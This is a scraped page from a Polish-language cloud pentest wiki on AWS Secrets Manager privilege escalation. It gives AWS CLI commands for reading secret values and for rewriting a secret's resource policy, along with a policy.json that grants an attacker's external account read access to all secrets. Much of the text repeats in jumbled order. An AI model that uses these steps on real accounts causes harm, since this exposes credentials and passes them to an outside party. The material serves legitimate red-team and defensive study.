AWS - Secrets Manager Privesc

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

Menedżer Sekretów

Aby uzyskać więcej informacji na temat menedżera sekretów, sprawdź:

AWS - Secrets Manager Enum

`secretsmanager:GetSecretValue`

Atakujący z tym uprawnieniem może uzyskać zapisana wartość wewnątrz sekretu w AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencjalny wpływ: Uzyskanie dostępu do wysoce wrażliwych danych w usłudze AWS Secrets Manager.

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

Dzięki wcześniejszym uprawnieniom możliwe jest przyznanie dostępu innym podmiotom/kontom (nawet zewnętrznym) do uzyskania dostępu do sekretu. Należy pamiętać, że aby odczytać sekrety zaszyfrowane kluczem KMS, użytkownik musi również mieć dostęp do klucza KMS (więcej informacji na stronie KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

PreviousAWS - Sagemaker Privesc NextAWS - SSM Privesc

Last updated 3 days ago

Menedżer Sekretów

Aby uzyskać więcej informacji na temat menedżera sekretów, sprawdź:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Atakujący z tym uprawnieniem może uzyskać zapisana wartość wewnątrz sekretu w AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencjalny wpływ: Uzyskanie dostępu do wysoce wrażliwych danych w usłudze AWS Secrets Manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

Menedżer Sekretów

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Menedżer Sekretów

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)